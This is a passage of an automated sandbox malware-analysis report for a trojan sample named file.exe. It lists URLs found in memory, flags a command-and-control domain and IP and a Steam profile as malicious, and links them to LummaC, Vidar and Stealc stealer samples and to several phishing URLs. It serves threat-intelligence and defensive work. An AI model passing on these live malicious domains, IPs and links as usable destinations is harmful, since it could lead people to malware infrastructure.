                                            https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=cdfmfile.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                              unknown
                                              https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&ampfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://steamcommunity.com/?subsection=broadcastsfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://help.steampowered.com/en/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://steamcommunity.com/market/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://store.steampowered.com/news/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    unknown
                                                    https://sergei-esenin.com/file.exe, 00000003.00000003.1344132717.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345433349.0000000000AF0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://store.steampowered.com/subscriber_agreement/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      http://store.steampowered.com/subscriber_agreement/file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgfile.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&amp;l=enfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://www.valvesoftware.com/legal.htmfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://steamcommunity.com/discussions/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&ampfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://store.steampowered.com/stats/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.pngfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://store.steampowered.com/steam_refunds/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&amp;file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedbackfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          unknown
                                                          https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            https://steamcommunity.com/workshop/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://store.steampowered.com/legal/file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&amp;l=efile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=qu55UpguGheU&amp;l=efile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&amp;l=englishfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&amp;l=englfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://store.steampowered.com/privacy_agreement/file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://store.steampowered.com/points/shop/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://store.steampowered.com/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvwfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.giffile.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://steamcommunity.com/profiles/76561199724331900/inventory/file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • URL Reputation: malware
                                                                  unknown
                                                                  https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&afile.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpgfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://store.steampowered.com/privacy_agreement/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&amp;l=enfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://sergei-esenin.com:443/apifile.exe, 00000003.00000002.1345090990.0000000000A87000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=10oP_O2Rfile.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&amp;l=englishfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&amp;l=englishfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          http://store.steampowered.com/account/cookiepreferences/file.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1345473697.0000000000B41000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://store.steampowered.com/mobilefile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          unknown
                                                                          https://steamcommunity.com/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://steamcommunity.com/profiles/765611997243319001file.exe, 00000003.00000002.1345090990.0000000000AB0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                              unknown
                                                                              https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&amp;l=englishfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&amp;l=englfile.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://store.steampowered.com/about/file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://steamcommunity.com/profiles/76561199724331900/badgesfile.exe, 00000003.00000002.1345090990.0000000000A93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1344104409.0000000000B36000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                • URL Reputation: malware
                                                                                unknown
                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs
                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                104.21.53.8
                                                                                sergei-esenin.comUnited States
                                                                                13335CLOUDFLARENETUStrue
                                                                                104.102.49.254
                                                                                steamcommunity.comUnited States
                                                                                16625AKAMAI-ASUSfalse
                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                Analysis ID:1528464
                                                                                Start date and time:2024-10-07 23:22:08 +02:00
                                                                                Joe Sandbox product:CloudBasic
                                                                                Overall analysis duration:0h 4m 55s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Cookbook file name:default.jbs
                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                Number of analysed new started processes analysed:15
                                                                                Number of new started drivers analysed:0
                                                                                Number of existing processes analysed:0
                                                                                Number of existing drivers analysed:0
                                                                                Number of injected processes analysed:0
                                                                                Technologies:
                                                                                • HCA enabled
                                                                                • EGA enabled
                                                                                • AMSI enabled
                                                                                Analysis Mode:default
                                                                                Analysis stop reason:Timeout
                                                                                Sample name:file.exe
                                                                                Detection:MAL
                                                                                Classification:mal100.troj.evad.winEXE@1/0@10/2
                                                                                EGA Information:
                                                                                • Successful, ratio: 100%
                                                                                HCA Information:Failed
                                                                                Cookbook Comments:
                                                                                • Found application associated with file extension: .exe
                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                • Excluded domains from analysis (whitelisted): d.8.0.a.e.e.f.b.0.0.0.0.0.0.0.0.5.0.0.0.0.0.8.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                • VT rate limit hit for: file.exe
                                                                                TimeTypeDescription
                                                                                17:23:12API Interceptor2x Sleep call for process: file.exe modified
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                104.21.53.8SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                                                                  lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                      CSY6k9gpVb.exeGet hashmaliciousLummaCBrowse
                                                                                        TuQlz67byH.exeGet hashmaliciousLummaCBrowse
                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                            c3KH2gLNrM.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                                                              Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                8ObkdHP9Hq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, StealcBrowse
                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                    104.102.49.254http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                    • www.valvesoftware.com/legal.htm
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    sergei-esenin.comSecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.53.8
                                                                                                    lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                    • 104.21.53.8
                                                                                                    Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                    • 172.67.206.204
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.206.204
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.53.8
                                                                                                    CSY6k9gpVb.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.53.8
                                                                                                    TuQlz67byH.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.53.8
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.206.204
                                                                                                    CatalogApp.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.206.204
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.53.8
                                                                                                    steamcommunity.comSecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.102.49.254
                                                                                                    utmggBCMML.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.102.49.254
                                                                                                    lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                    • 104.102.49.254
                                                                                                    Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                    • 104.102.49.254
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.102.49.254
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 92.122.104.90
                                                                                                    WiTqtf1aiE.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                    • 104.102.49.254
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.102.49.254
                                                                                                    out.exeGet hashmaliciousVidarBrowse
                                                                                                    • 104.102.49.254
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.102.49.254
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    CLOUDFLARENETUShttps://url.avanan.click/v2/r01/___https://www.tiktok.com/qnspdA7?fni=6cbb&qfsl=js&xhjsj=gnt_zwq&yfwljy=myyux:ddBBB.lttlqj.ht.zpdzwq?v=frudxdBjlfmjfqymhfwj.ht.pjd.kwjsy___.YXAzOnNvdXRoZXJua2l0Y2hlbmFuZGdyaWxsOmE6bzpiNGZlZGFhNjcxOTBhYjU4MTE5MjBlZTRiYTAxZmUwMTo3OmIxYWM6MDg1ODNlNjljZDkwNThkM2ZiM2RjYTI4MzFjZGY4NGFmMTYyZTlhYmVjYWYxY2Q4MmNkZDhiNmFmOWVkOWUxOTpoOlQ6VA#Sm9hbi5LbmlwcGVuQEVsa2F5LkNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    EUYIlr7uUX.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 172.65.255.143
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.53.8
                                                                                                    lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                    • 104.21.53.8
                                                                                                    Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                    • 172.67.206.204
                                                                                                    https://www.dropbox.com/scl/fi/qo6796ed7hlrt0v8k9nr6/Patagonia-Health-Barcode-Scanner-Setup-2024.exe?rlkey=5bmndvx8124ztopqewiogbnlt&st=yvxpokhf&dl=0Get hashmaliciousUnknownBrowse
                                                                                                    • 1.1.1.1
                                                                                                    https://dsdhie.org/dsjhemGet hashmaliciousUnknownBrowse
                                                                                                    • 188.114.96.3
                                                                                                    L-tron_Payroll.docxGet hashmaliciousUnknownBrowse
                                                                                                    • 104.17.25.14
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 172.67.206.204
                                                                                                    https://communications-chamber-confidentiality-limitation.trycloudflare.com/spec/#bWNhcnR3cmlnaHRAY2hlbXVuZ2NhbmFsLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                    • 104.16.231.132
                                                                                                    AKAMAI-ASUSSecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.102.49.254
                                                                                                    utmggBCMML.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.102.49.254
                                                                                                    lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                    • 104.102.49.254
                                                                                                    Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                    • 104.102.49.254
                                                                                                    https://www.dropbox.com/scl/fi/qo6796ed7hlrt0v8k9nr6/Patagonia-Health-Barcode-Scanner-Setup-2024.exe?rlkey=5bmndvx8124ztopqewiogbnlt&st=yvxpokhf&dl=0Get hashmaliciousUnknownBrowse
                                                                                                    • 184.28.90.27
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.102.49.254
                                                                                                    https://dsdhie.org/dsjhemGet hashmaliciousUnknownBrowse
                                                                                                    • 88.221.169.152
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 92.122.104.90
                                                                                                    https://statics.teams.cdn.office.net/evergreen-assets/safelinks/1/atp-safelinks.html?url=https%3A%2F%2Fphpstack-1335745-4931432.cloudwaysapps.com%2F%23%26%26%2B~XanJlZEBwcm9hZy5jb20=&locale=en-us&dest=https%3A%2F%2Fteams.microsoft.com%2Fapi%2Fmt%2Fpart%2Famer-03%2Fbeta%2Fatpsafelinks%2Fgeturlreputationsitev2%2F&pc=dqIG3sYngZE8N2eRBkF7CAkOWKg5g3tGjnQGJGQlc61U8QGlKCs5AzH6JKtW7FyetS1g5oEXSNBKJVlJbTCgrea0O041dBSjafsPfOc5KxbMkQRnpwalZQdhHfcjoeWL7rzuDGG%252fj2e7scaAUTCy2PY0WmBb87rgNNPdmEQne%252f00jq9aOpwCvhJrGkNK5f8MP5jaUwccFhr9IIoVaCOrXUhSnuRv%252fw%252bxhUGpneOsAgBs7CjJQbmepBIHfEqwCkqvDbYbxYB4Hm9sLVAOFaz9VFMFSXPJt4MqeWAChikWLAZATmvniptR3h97WVF%252fZtjtm3RxdNyPROzhUvL92w9fdWmSw%252bHBxn5rMHOUpaQU16ZpcfATiVaU51fqKaYO2v4ZnK7axAavLgOpgAJivuE6JO2sqksPH41Z6PVam5c4J%252bwwz5Z2pqrOSxPxEcPGeDff%252bxp9PApNxpvURRLl98WzRw%252ftZEOu%252foKPhjN0OiTGAQDLRWTF%252bMCzSQg37tk7ZYUYYc0Ycs4xDjchhFprJCCSfrZ8WyHq6cjqmnbgDKRQig28xGNFnSDEeWMDBQeeeVyNqDv0FAAxkSAMO%252b7t4Qu1y0h0MHJYEb5pxfOYe8Pyfcsn7pyR%252fkKEqziEQVGlIETrpjVMNyrhJrnX9S%252flWaxf0H3tD%252fqMhzPysO9QdPSJTG054WE4jq5GRqTKu8P25t4KJLY15Oz2j5iCg7Bd5lczhgv4PQevplLuCGckM%252fs5EPk2r2FkSOxHF51EB5FR2TgXQR5UAp2BbaWTm9irKwSSUK5z1MsGMDokVMEB4bQ9mpZrl1%252bDMixJ1mQyyLXpelmEyN8zw1nTsbXAvDQgIvPLPj0QUtphEMnmVEXMkQHiw2WHWUSxIxYcY%252fltyp6bnMrankPAnpChbWQmk95rKsUz8tqtLjNDclK1y1FLy%252fh7sed9duxDDFupXnhmXxGJOmUV6FG1arxXL8urm1F98thG8anfchv3DafKsyVHHgmdUFNH6Uhcu4sB8fo0kqm2y7IWS96w5BeG334JvnFDJPLDPvtK5ojeXfDXh%252boKJdBxXGC9NmPwgDp8XeOavQnNlJRfUAXkhukdjDg1EHGF%252b9luUuTH%252fEbKHniTzx4OvIWUnDvXcdpuEIAnW8mDJzMXpmxpl3nwtTqeQWMeSNzjute9yTZEU%252beQk498EMyU%252fuPUg%252fSOH5r%252fwjGCsPpm%252f%252bUA00SsNvWuDD0AbNIKYubFuNKQ3SX6N7M11wOksoUG%252fz9IheWtOawwl7F0lqN3xkTQhfiiHovdudAPiB%252fzt25Im27XxPQ9s1c%252bnOWOPh6m%252bvaCQcj6bcwkFbNl5Y1KL7XQvirYSFsNXnrYuQvTPMk1n5CRq6dxsl9FRGV9MMdrZduC%252bG4B0zxLA58d8fTW2zfEXnRcMTgQKLK%252fmeZT7K3wwAvQiA%253d%253d%3B%20expires%3DWed%2C%2009%20Oct%202024%2014%3A05%3A23%20GMT%3B%20path%3D%2F%3B%20SameSite%3DNone%3B%20secuGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 2.19.126.151
                                                                                                    WiTqtf1aiE.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                    • 104.102.49.254
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    a0e9f5d64349fb13191bc781f81f42e1SecuriteInfo.com.Win32.PWSX-gen.27846.23954.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.53.8
                                                                                                    • 104.102.49.254
                                                                                                    utmggBCMML.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.53.8
                                                                                                    • 104.102.49.254
                                                                                                    lihZ6gUU7V.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                    • 104.21.53.8
                                                                                                    • 104.102.49.254
                                                                                                    Bn7LPdQA1s.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                    • 104.21.53.8
                                                                                                    • 104.102.49.254
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.53.8
                                                                                                    • 104.102.49.254
                                                                                                    SecuriteInfo.com.Win32.PWSX-gen.19404.14810.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.53.8
                                                                                                    • 104.102.49.254
                                                                                                    WiTqtf1aiE.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                    • 104.21.53.8
                                                                                                    • 104.102.49.254
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                    • 104.21.53.8
                                                                                                    • 104.102.49.254
